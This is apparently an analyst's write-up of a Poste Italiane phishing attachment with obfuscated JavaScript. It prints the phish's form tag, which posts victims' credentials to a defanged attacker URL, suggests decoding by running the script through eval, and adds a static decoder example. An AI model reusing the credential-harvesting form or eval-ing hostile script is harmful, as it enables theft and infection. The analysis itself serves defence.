Poste italiane Phish

The number of victims of phishing attacks increases day by day. Phishing attackers generally target victims through spam emails, which may contain a message that manipulates the victim into clicking the phishing link.

Phishing attacks are commonly used to steal the user’s sensitive information, such as bank credentials and credit card information, and sometimes even to download malware payloads.

Here we have a typical case in which the phish document was delivered as an obfuscated attachment to the spam email.

This is a phish document of “Poste italiane” (Italian Postal Service Company), where a spam email was sent to the victim with an attachment containing obfuscated JavaScript.


“verifica_entro_24_ore_la_tua_identita.html”

Virus Total URL

The email message is written in a way that tricks the victim into opening the HTML attachment, which contains obfuscated JS code.

Viewing the source of the HTML file shows JavaScript code that declares an array of values, followed by the decrypting function.


To decode the obfuscated JavaScript code, replace “document.write(em)” with “eval(em)”. This will decode the actual HTML code.


The decoded HTML will again display the same Phish HTML layout.

When analyzing a phish document, the most important thing is to identify the action URL. This is the URL to which the collected information is sent.

This URL is usually found in the code of a button, such as the “Accedi” button in this phish layout. When clicked, this button validates the information entered and sends it to the attacker.

In this case, while searching, I could not find any visible action URL, as the HTML document is coded in such a way that the analyst cannot identify the action URL easily.

Then I found something else suspicious, which contained an HTML escape character encoding.

Again, after decoding it, I got the action URL.

<form id="datiForm" name="datiForm" method="post" action="hxxp://www.delletredonzelle.it/contatti/jquery.ui.widget.config.php" onsubmit="return form_submit(this);">
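
One way to recover a hidden action URL like the one above without running the attachment's script, as an added example that is not code from the original post: it statically decodes percent and numeric-entity escapes, then lists every form action in defanged form. The sample input, the `.example` hosts and all function names are constructed for illustration, and it assumes the hidden markup uses these escape styles.

```javascript
// Added example: static decoding only, nothing is eval'd or written to a DOM.
// SAMPLE is constructed; the hosts are reserved .example names.
const SAMPLE =
  '<script>document.write(unescape("%3Cform%20id%3D%22demoForm%22%20method%3D%22post%22' +
  '%20action%3D%22http%3A%2F%2Fcollector.example%2Fsubmit.php%22%3E"));</script>' +
  '<div>&#60;form action=&#34;http&#58;//second.example/x.php&#34;&#62;</div>';

// Turn a code point into text, leaving out-of-range values untouched.
const fromCode = (n, raw) => (n <= 0x10ffff ? String.fromCodePoint(n) : raw);

// Decode %uXXXX, %XX, &#xHH; and &#NN; escapes as plain text.
function decodeLayer(text) {
  return text
    .replace(/%u([0-9a-f]{4})/gi, (m, h) => fromCode(parseInt(h, 16), m))
    .replace(/%([0-9a-f]{2})/gi, (m, h) => fromCode(parseInt(h, 16), m))
    .replace(/&#x([0-9a-f]+);/gi, (m, h) => fromCode(parseInt(h, 16), m))
    .replace(/&#(\d+);/g, (m, d) => fromCode(parseInt(d, 10), m));
}

// Repeat until the text stops changing, to unwrap nested encodings.
function decodeAll(text, maxRounds = 5) {
  for (let i = 0; i < maxRounds; i++) {
    const next = decodeLayer(text);
    if (next === text) break;
    text = next;
  }
  return text;
}

// Defang the scheme so the URL is not clickable in a report.
const defang = (url) => url.replace(/^http/i, 'hxxp');

// Decode, then collect the action attribute of every <form> tag.
function extractFormActions(html) {
  const re = /<form\b[^>]*?\baction\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const urls = [];
  for (const m of decodeAll(html).matchAll(re)) {
    urls.push(defang(m[1] ?? m[2] ?? m[3]));
  }
  return urls;
}

console.log(extractFormActions(SAMPLE));
```

Because the input is only treated as text, the attachment's script never executes and no request is made to the collection host.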

